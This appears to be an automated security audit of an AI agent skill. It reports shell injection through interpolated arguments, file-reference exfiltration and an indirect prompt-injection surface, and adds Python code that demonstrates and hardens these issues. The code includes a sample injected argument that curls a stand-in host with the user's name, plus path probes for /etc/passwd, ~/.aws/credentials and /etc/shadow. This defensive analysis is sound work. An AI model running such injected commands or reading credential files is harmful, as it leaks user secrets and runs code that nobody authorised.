command-creation

Fail

Audited by Gen Agent Trust Hub on Mar 15, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill defines a `!command` syntax that executes arbitrary bash commands. Although the documentation suggests using read-only commands, it explicitly gives examples of destructive or state-modifying operations such as `rm -rf dist/` and `git checkout` (both in references/common-patterns.md), which risk data loss or unauthorized changes to the working tree.
  • [COMMAND_EXECUTION]: Command templates interpolate positional arguments ($1, $2, etc.) directly into shell commands (e.g., `!npm test -- $1 --coverage` in references/template-syntax.md). This pattern is highly susceptible to shell injection: an argument containing metacharacters (e.g., `;`, `&`, `|`) can run additional, unauthorized commands. The skill provides no guidance or mechanism for sanitizing, escaping, or validating these inputs.
  • [DATA_EXFILTRATION]: The skill documents and encourages the use of file references (`@path/to/file`) and shell commands (such as `git log`, `find`, and `cat`) to pull local file contents and repository metadata into the agent's context (SKILL.md, references/template-syntax.md). This makes it possible to read and expose sensitive source code or project configuration without authorization.
  • [PROMPT_INJECTION]: The skill creates an indirect prompt-injection surface by interpolating untrusted command arguments into prompt templates.
    • Ingestion points: Command arguments ($ARGUMENTS, $1, $2, etc.), identified in references/template-syntax.md.
    • Boundary markers: Absent; the provided templates contain no delimiters and no instructions to ignore embedded commands.
    • Capability inventory: File system access via `@` and arbitrary shell command execution via `!`, identified in SKILL.md.
    • Sanitization: No argument sanitization, escaping, or validation logic is present in the skill instructions or examples.
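The two concrete mechanisms behind these findings, positional interpolation into `!` shell templates and `@` file references, can be reproduced and hardened in a few dozen lines. The following is an added illustration written for this report; it is not code from the command-creation skill, and the template string, the hostile argument, the temporary repository layout and the `resolve_file_reference` / `expand_quoted` helpers are all constructed assumptions rather than anything the skill ships. It shows the injectable expansion next to a quoted one, checks both with a real `sh -c`, and shows a containment check for `@` paths that resolves `..` and symlinks before deciding.

```python
import re
import shlex
import subprocess
import tempfile
from pathlib import Path

# Constructed sample inputs (not taken from the skill's files). The template
# mirrors the `!npm test -- $1 --coverage` pattern cited in the finding.
TEMPLATE = "npm test -- $1 --coverage"
HOSTILE_ARG = "tests/unit; curl http://example.invalid/$(whoami)"

_POSITIONAL = re.compile(r"\$(\d+)")
SHELL_OPERATORS = {";", "&&", "||", "|", "&", "(", ")", "<", ">"}


def expand_unsafe(template: str, args: list[str]) -> str:
    """Paste positional arguments straight into the shell string: the pattern the
    audit flags. Whatever metacharacters the argument carries reach the shell."""
    return _POSITIONAL.sub(lambda m: args[int(m.group(1)) - 1], template)


def expand_quoted(template: str, args: list[str]) -> str:
    """Hardened expansion: refuse control characters, then shell-quote each value so
    sh receives it as exactly one word no matter what it contains."""
    def substitute(m):
        idx = int(m.group(1)) - 1
        if not 0 <= idx < len(args):
            raise ValueError(f"template uses ${idx + 1} but only {len(args)} argument(s) were given")
        value = args[idx]
        if "\x00" in value or "\n" in value:
            raise ValueError("control characters are not allowed in arguments")
        return shlex.quote(value)
    return _POSITIONAL.sub(substitute, template)


def injected_operators(command: str) -> list[str]:
    """List the unquoted shell operators a POSIX shell would act on. shlex's
    punctuation mode emits operators as separate tokens only outside quotes, so a
    properly quoted argument containing ';' is not reported."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return [tok for tok in lexer if tok in SHELL_OPERATORS]


def run_in_sh(command: str) -> str:
    """Run the expanded string the way the `!` syntax does (sh -c) and return stdout.
    Used here only with a harmless printf template."""
    return subprocess.run(["sh", "-c", command], capture_output=True,
                          text=True, check=False).stdout


def resolve_file_reference(repo_root: Path, ref: str) -> Path:
    """Confine an `@path` reference to the repository (hypothetical helper). Home-relative
    and absolute paths are refused outright; `..` segments and symlinks are resolved
    before the containment check so they cannot reach files outside the tree."""
    if not ref.startswith("@"):
        raise ValueError("file references must start with '@'")
    raw = ref[1:]
    if raw.startswith("~") or Path(raw).is_absolute():
        raise PermissionError(f"refusing non-repository path: {raw}")
    root = repo_root.resolve()
    target = (root / raw).resolve()
    if target != root and root not in target.parents:
        raise PermissionError(f"{ref} escapes the repository root")
    return target


def demo() -> dict:
    """Exercise both findings on constructed input and return the observations."""
    out = {}
    # Finding 1: shell injection through $1. The unsafe form hands sh a second command.
    unsafe = expand_unsafe(TEMPLATE, [HOSTILE_ARG])
    quoted = expand_quoted(TEMPLATE, [HOSTILE_ARG])
    out["unsafe_operators"] = injected_operators(unsafe)   # [';', '(', ')']
    out["quoted_operators"] = injected_operators(quoted)   # []
    # The same thing observed through a real shell, with a template that only prints.
    printf_tpl = "printf '[%s]\\n' $1"
    out["unsafe_stdout"] = run_in_sh(expand_unsafe(printf_tpl, ["a; echo INJECTED"]))
    out["quoted_stdout"] = run_in_sh(expand_quoted(printf_tpl, ["a; echo INJECTED"]))
    # Finding 2: @ references that try to leave a constructed temporary repository.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "repo"
        (root / "src").mkdir(parents=True)
        (root / "src" / "app.py").write_text("print('hello')\n")
        out["inside_ok"] = resolve_file_reference(root, "@src/app.py").name
        escapes = []
        for ref in ("@../../etc/passwd", "@~/.aws/credentials", "@/etc/shadow"):
            try:
                resolve_file_reference(root, ref)
            except PermissionError:
                escapes.append(ref)
        out["escapes_blocked"] = escapes
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Quoting with `shlex.quote` is the minimal fix for a design that insists on passing the expanded string to a shell; where the template author controls execution, building an argv list and calling the program without `sh -c` removes the metacharacter problem entirely. The `@` check must compare resolved paths on both sides, because a symlink inside the repository or a `..` segment in the reference otherwise passes a naive prefix comparison.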
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Mar 15, 2026, 11:43 AM